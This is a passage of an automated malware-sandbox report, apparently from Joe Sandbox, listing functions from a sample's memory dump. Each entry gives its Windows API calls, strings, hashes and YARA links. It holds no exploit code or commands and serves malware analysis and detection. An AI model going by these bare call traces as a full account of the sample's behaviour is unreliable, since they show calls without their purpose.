Instruction Fuzzy Hash: D89179746083119FC700EF24D58496ABBE4FF89714F1489ADF88A9B351DB34EE45CB92

Function 00B24BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00B0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
Part of subcall function 00B0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
Part of subcall function 00B0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
Part of subcall function 00B0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B24C51
_wcslen.LIBCMT ref: 00B24D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B24DCF
CoTaskMemFree.OLE32(?), ref: 00B24DDA

Strings

NULL Pointer assignment, xrefs: 00B24E23, 00B24E52

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
Instruction ID: dfb54bfc02b64c30e874dea6c2f686290c6f6b778957d43a4d23e75784b59d06
Opcode Fuzzy Hash: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
Instruction Fuzzy Hash: 1C910871D002299FDF14DFA4D891AEEBBB9FF09310F1085A9E519A7291DB349E44CF60

Function 00B320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B32183
GetMenuItemCount.USER32(00000000), ref: 00B321B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B321DD
_wcslen.LIBCMT ref: 00B32213
GetMenuItemID.USER32(?,?), ref: 00B3224D
GetSubMenu.USER32(?,?), ref: 00B3225B

Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B322E3

Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1ad8beb6788bed4c5afbde9fec681c19f7496c51f6e35a22ec8a7bd94339116a
Instruction ID: 7b458a94339b3426a987cdba00cceea0aabdda17772410e0c6fa498edff7b749
Opcode Fuzzy Hash: 1ad8beb6788bed4c5afbde9fec681c19f7496c51f6e35a22ec8a7bd94339116a
Instruction Fuzzy Hash: D4715D75A00215AFCB10DFA4CD85AAEBBF5EF49310F248499E916BB351DB34ED418B90

Function 00B0AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B0AEF9
GetKeyboardState.USER32(?), ref: 00B0AF0E
SetKeyboardState.USER32(?), ref: 00B0AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B0AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B0B020

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
Instruction ID: ca9d65e746198ee2b6991838d889173d8200c8062a45f5b32730b2be270fa5c2
Opcode Fuzzy Hash: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
Instruction Fuzzy Hash: A15191A1A047D63DFB368334CC45BBABEE99B06304F0889C9E1D9968C2D799ACC4D751

Function 00B0ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B0AD19
GetKeyboardState.USER32(?), ref: 00B0AD2E
SetKeyboardState.USER32(?), ref: 00B0AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B0ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B0ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B0AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B0AE38

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
Instruction ID: 5272706eb954ee66564b29b57b2f41506da94b43914ae05ed5de94dc82b8370b
Opcode Fuzzy Hash: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
Instruction Fuzzy Hash: 4051F5A15047D53DFB338334CC95BBABEE8AB46300F1889D9E1D5568C3D694EC88D762

Function 00AD542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00AE3CD6,?,?,?,?,?,?,?,?,00AD5BA3,?,?,00AE3CD6,?,?), ref: 00AD5470
__fassign.LIBCMT ref: 00AD54EB
__fassign.LIBCMT ref: 00AD5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AE3CD6,00000005,00000000,00000000), ref: 00AD552C
WriteFile.KERNEL32(?,00AE3CD6,00000000,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD554B
WriteFile.KERNEL32(?,?,00000001,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD5584

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
Instruction ID: 2b8ec10df840b18c6e83db769abb81dbdb34fc9aafcc9a411c4e5b9fd1bfb3e8
Opcode Fuzzy Hash: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
Instruction Fuzzy Hash: 1C519FB1E00649AFDB11CFA8E845AEEBBF9EF09300F14411BE556E7391D6309A81CB61

Function 00AC2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00AC2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00AC2D53
_ValidateLocalCookies.LIBCMT ref: 00AC2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00AC2E0C
_ValidateLocalCookies.LIBCMT ref: 00AC2E61

Strings

csm, xrefs: 00AC2DF6

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
Instruction ID: dc9e79ef6517f70d5ea39cc0ba616b5d3837b77291360a4ea2becd64bb11cf96
Opcode Fuzzy Hash: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
Instruction Fuzzy Hash: F441B034A00209ABCF10DF68C845FAEBBB5BF44324F168159E815AB392DB31AA01CBD0

Function 00B210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B21112
WSAGetLastError.WSOCK32 ref: 00B21121
WSAGetLastError.WSOCK32 ref: 00B211C9
closesocket.WSOCK32(00000000), ref: 00B211F9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
Instruction ID: f22154e089e2441bfb80bae9ceb0df126cf21d90890ab901377dadaf6938e24d
Opcode Fuzzy Hash: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
Instruction Fuzzy Hash: 07410931600214AFDB109F58D885BAEBBE9FF45325F148599FD09AB291C770EE41CBE1

Function 00B0CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD

Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16

lstrcmpiW.KERNEL32(?,?), ref: 00B0CF45
MoveFileW.KERNEL32(?,?), ref: 00B0CF7F
_wcslen.LIBCMT ref: 00B0D005
_wcslen.LIBCMT ref: 00B0D01B
SHFileOperationW.SHELL32(?), ref: 00B0D061

Strings

\*.*, xrefs: 00B0CFF3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
Instruction ID: 2eb46657a5b075a1b86ea6c79e2f578db0dfb1cb7d70543c583ca6bdbcd1636c
Opcode Fuzzy Hash: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
Instruction Fuzzy Hash: 824117719452195EDF12EFA4D981EDE7BF9EF48380F1001E6E509E7181EF34A648CB51

Function 00B32DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B32E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B32EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B32EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B32EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B32F0B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
Instruction ID: 2581fe25b7047acc6174c5a1830cae6b1d7fff54fe3ebc7754d14c6b8d4b31cd
Opcode Fuzzy Hash: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
Instruction Fuzzy Hash: 90310635604260AFDB21CF5CDC86F6937E1FB9A710F2501A4FA049F2B1CB71A881DB51

Function 00B07726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B0778F
SysAllocString.OLEAUT32(00000000), ref: 00B07792
SysAllocString.OLEAUT32(?), ref: 00B077B0
SysFreeString.OLEAUT32(?), ref: 00B077B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00B077DE
SysAllocString.OLEAUT32(?), ref: 00B077EC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f116e24311831d460bb77153130cf11af2c73da24d911fc6afe3078b84297c30
Instruction ID: e1ee94b5cd6d62ac54b22666b727b3544ad21a77defc5bfd6fe930f82ec2d9c3
Opcode Fuzzy Hash: f116e24311831d460bb77153130cf11af2c73da24d911fc6afe3078b84297c30
Instruction Fuzzy Hash: 5F218376A04219BFDB10DFA8CC88CBB7BECEB097A47148065B915DB291DA70ED418764

Function 00B077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07868
SysAllocString.OLEAUT32(00000000), ref: 00B0786B
SysAllocString.OLEAUT32 ref: 00B0788C
SysFreeString.OLEAUT32 ref: 00B07895
StringFromGUID2.OLE32(?,?,00000028), ref: 00B078AF
SysAllocString.OLEAUT32(?), ref: 00B078BD

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2f8dee17204633cdcf2d61c8d579cbb8b5f9575e79154050aeef19d14ac3e0e8
Instruction ID: d4cb4d906aebef2989e1bdbbbd14f62de7d0527941d9aeb639d8984c5e1e9735
Opcode Fuzzy Hash: 2f8dee17204633cdcf2d61c8d579cbb8b5f9575e79154050aeef19d14ac3e0e8
Instruction Fuzzy Hash: C9215132A04204BFDB109BE9DC8CDAABBECEB097607148165B915DB2E1DE74EC41CB64

Function 00B104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B104F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B1052E

Strings

nul, xrefs: 00B10567

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
Instruction ID: 28bbe475bfe018928c521f9be3ce876a7ba0b7cd50919df4fa4da1748b3a38e4
Opcode Fuzzy Hash: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
Instruction Fuzzy Hash: FE218071510305ABDB20AF69DC84ADA7BF5EF54724F604A59F8A1E72E0D7B099D0CF20

Function 00B105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B10601

Strings

nul, xrefs: 00B10639

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
Instruction ID: acb0116e48c4b6fa42156901fd379b7a24542cb530fe3dad6c3393a755c437a4
Opcode Fuzzy Hash: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
Instruction Fuzzy Hash: 50219575510305ABDB20AF69DC44ADA77E4FF95720F600A59F8A1E72E0DBF098E0CB10

Function 00B340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B34112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B3411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B3412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B34139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B34145

Strings

Msctls_Progress32, xrefs: 00B340E3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
Instruction ID: bf5380878b7b8f66134577ee5030cb3c1583f8c7d5b68cc2d8e9cd5e7f8274e7
Opcode Fuzzy Hash: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
Instruction Fuzzy Hash: 2A11B2B2140219BEEF118F64CC86EE77FADEF08798F114111FA18A6090CB729C61DBA4

Function 00ADD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ADD7A3: _free.LIBCMT ref: 00ADD7CC

_free.LIBCMT ref: 00ADD82D

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00ADD838
_free.LIBCMT ref: 00ADD843
_free.LIBCMT ref: 00ADD897
_free.LIBCMT ref: 00ADD8A2
_free.LIBCMT ref: 00ADD8AD
_free.LIBCMT ref: 00ADD8B8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 6cdbb734768161fba9956c197a71fd4a872b6a437e7ebc21e0cb0afb545d4a52
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 3B115E71540B04AAD621BFB0CE47FCB7BDCAF50700F400826B29FAA292DA65B6059760

Function 00B0DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

